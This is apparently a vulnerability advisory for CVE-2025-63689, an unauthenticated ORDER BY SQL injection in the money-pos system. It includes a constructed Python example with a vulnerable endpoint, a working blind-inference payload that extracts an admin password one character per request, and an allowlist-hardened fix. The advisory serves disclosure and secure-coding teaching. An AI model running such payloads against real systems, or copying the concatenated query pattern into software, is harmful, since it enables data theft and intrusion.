CVE-2025-63689
Published: 07 November 2025
Description
Adversaries may attempt to exploit a weakness in an Internet-facing host or system to initially access a network.
Security Summary
CVE-2025-63689 covers multiple SQL injection vulnerabilities (CWE-89) in the ycf1998 money-pos system, affecting all versions before commit 11f276bd20a41f089298d804e43cb1c39d041e59, released on 2025-09-14. The injection point is the orderby parameter. A sort column or direction cannot be supplied as a bound query parameter, so ORDER BY clauses are commonly assembled by string concatenation, which is exactly the pattern that lets a client-supplied value become part of the executed SQL. The advisory rates the impact as arbitrary code execution; how far control of the SQL extends beyond the database (to file writes or operating-system commands) depends on the database engine, its configuration, and the privileges of the application's database account, but at minimum the attacker gains read and write access to everything the application can reach in its database. The vulnerability carries a CVSS v3.1 base score of 10.0 (AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H): reachable over the network, low attack complexity, no privileges or user interaction required, a scope change, and high impact on confidentiality, integrity, and availability.
Any unauthenticated remote attacker who can reach the application can exploit the flaw with minimal effort. Successful exploitation gives the attacker control over the SQL the application executes and, per the advisory, arbitrary code execution on the affected host, which can lead to full server compromise, exfiltration of the application's data, and a foothold for lateral movement within the environment.
The fix is commit https://github.com/ycf1998/money-pos/commit/11f276bd20a41f089298d804e43cb1c39d041e59. Additional details, including a proof-of-concept, are documented in the GitHub issue at https://github.com/ycf1998/money-pos/issues/3 and a related gist at https://gist.github.com/LockeTom/2ed0f3751c88542f48b7c230468d2a46. Operators should confirm that the deployed build contains this commit (or a later one) and update immediately where it does not; because the flaw needs no authentication, exposed instances should also have their web server and database logs reviewed for unexpected values in the orderby parameter.
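The following is an added illustration of the ORDER BY injection class described above; it is not code from money-pos, from the linked issue, or from the gist. It is a constructed Python/sqlite3 listing endpoint that builds its ORDER BY clause by concatenation, a blind-inference payload that leaks one bit of another table per request through the returned sort order, and an allowlist-based hardened version of the same endpoint. The table names (product, sys_user), columns and rows are invented for the example; nothing here describes money-pos's actual schema or the actual proof-of-concept.

```python
import sqlite3


def setup_db():
    """Constructed sample database (schema and rows invented for this example)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE product(id INTEGER PRIMARY KEY, name TEXT, price INTEGER);
        CREATE TABLE sys_user(id INTEGER PRIMARY KEY, username TEXT, password TEXT);
        INSERT INTO product VALUES (1, 'cola', 3), (2, 'bread', 5), (3, 'milk', 4);
        INSERT INTO sys_user VALUES (1, 'admin', 's3cret');
    """)
    return conn


def list_products_vulnerable(conn, orderby):
    """Vulnerable pattern (CWE-89): the client-controlled sort expression is concatenated
    into the statement. A '?' placeholder cannot take a column name, so developers fall
    back to string building here; the attacker then supplies an arbitrary SQL expression
    that the database evaluates for every row. Returns the product ids in response order."""
    sql = f"SELECT id, name, price FROM product ORDER BY {orderby}"
    return [row[0] for row in conn.execute(sql)]


def blind_payload(condition):
    """Sort key flips between two columns depending on CONDITION, so the order of the
    response leaks one bit about data the endpoint was never meant to expose."""
    return f"(CASE WHEN ({condition}) THEN price ELSE id END)"


def extract_password_blind(conn, max_len=32):
    """Recover the admin password one character per request using only the id order of
    the product listing: ORDER BY price yields [1, 3, 2], ORDER BY id yields [1, 2, 3]."""
    charset = "abcdefghijklmnopqrstuvwxyz0123456789"
    recovered = ""
    for pos in range(1, max_len + 1):
        for ch in charset:
            cond = (f"(SELECT substr(password, {pos}, 1) FROM sys_user "
                    f"WHERE username = 'admin') = '{ch}'")
            if list_products_vulnerable(conn, blind_payload(cond)) == [1, 3, 2]:
                recovered += ch
                break
        else:
            return recovered  # nothing matched: end of string (or char outside charset)
    return recovered


# Server-side allowlists: the request value is only a lookup key, never SQL text.
ALLOWED_COLUMNS = {"id": "id", "name": "name", "price": "price"}
ALLOWED_DIRECTIONS = {"asc": "ASC", "desc": "DESC"}


def list_products_hardened(conn, orderby):
    """Hardened pattern: the SQL is assembled only from the allowlist's own constants, so
    no client-supplied bytes reach the query; anything not on the list is rejected."""
    parts = orderby.strip().split()
    if not 1 <= len(parts) <= 2:
        raise ValueError("invalid orderby")
    column = ALLOWED_COLUMNS.get(parts[0].lower())
    direction = ALLOWED_DIRECTIONS.get(parts[1].lower() if len(parts) == 2 else "asc")
    if column is None or direction is None:
        raise ValueError("invalid orderby")
    sql = f"SELECT id, name, price FROM product ORDER BY {column} {direction}"
    return [row[0] for row in conn.execute(sql)]


def hardened_rejects(conn, orderby):
    """True if the hardened endpoint refuses ORDERBY."""
    try:
        list_products_hardened(conn, orderby)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    db = setup_db()
    print("vulnerable, orderby=id      :", list_products_vulnerable(db, "id"))
    print("vulnerable, blind extraction:", extract_password_blind(db))
    print("hardened, orderby=price desc:", list_products_hardened(db, "price desc"))
    print("hardened rejects payload    :", hardened_rejects(db, blind_payload("1=1")))
```

The point of the hardened version is that the fix for an ORDER BY sink is not escaping or quoting, which does not apply to identifiers, but mapping the request value onto a fixed set of server-side constants; the same mapping approach applies whatever web framework or ORM the application uses.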
Details
- CWE(s): CWE-89 Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
Affected Products
- ycf1998 money-pos, versions before commit 11f276bd20a41f089298d804e43cb1c39d041e59
MITRE ATT&CK Enterprise Techniques
- T1190 Exploit Public-Facing Application
Why these techniques?
The SQL injection in money-pos sits in a public-facing web application and is reachable by unauthenticated remote attackers, who exploit it to gain initial access and, per the advisory, arbitrary code execution on the host; that is the defining pattern of T1190: Exploit Public-Facing Application.